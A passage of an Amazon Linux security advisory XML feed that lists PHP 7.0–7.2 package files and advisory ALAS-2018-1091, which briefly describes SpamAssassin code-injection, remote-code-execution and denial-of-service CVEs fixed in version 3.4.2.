release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.32" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.32-1.31.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.32" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.32-1.31.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.11-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1091</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1091: important priority package update for spamassassin</title><issued date="2018-10-17 21:58:00" /><updated date="2018-10-18 22:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11781:
A flaw was found in the way a local user on the SpamAssassin server could inject code in the meta rule syntax. This could cause the arbitrary code execution on the server when these rules are being processed.
1629536:
CVE-2018-11781 spamassassin: Local user code injection in the meta rule syntax
CVE-2018-11780:
A potential Remote Code Execution bug exists with the PDFInfo plugin in Apache SpamAssassin before 3.4.2.
1629532:
CVE-2018-11780 spamassassin: Potential remote code execution vulnerability in PDFInfo plugin
CVE-2017-15705:
A flaw was found in the way SpamAssassin processes HTML email containing unclosed HTML tags. A carefully crafted mail message could cause SpamAssassin to consume significant resources. If a large number of these messages are sent, a denial of service could occur potentially delaying or preventing the delivery of email.
1629521:
CVE-2017-15705 spamassassin: Certain unclosed tags in crafted emails allow for scan timeouts and result in denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15705" title="" id="CVE-2017-15705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11780" title="" id="CVE-2018-11780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11781" title="" id="CVE-2018-11781" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="spamassassin-debuginfo" version="3.4.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-debuginfo-3.4.2-2.14.amzn1.x86_64.rpm</filename></package><package name="spamassassin" version="3.4.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-3.4.2-2.14.amzn1.x86_64.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-debuginfo-3.4.2-2.14.amzn1.i686.rpm</filename></package><package name="spamassassin" version="3.4.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-3.4.2-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 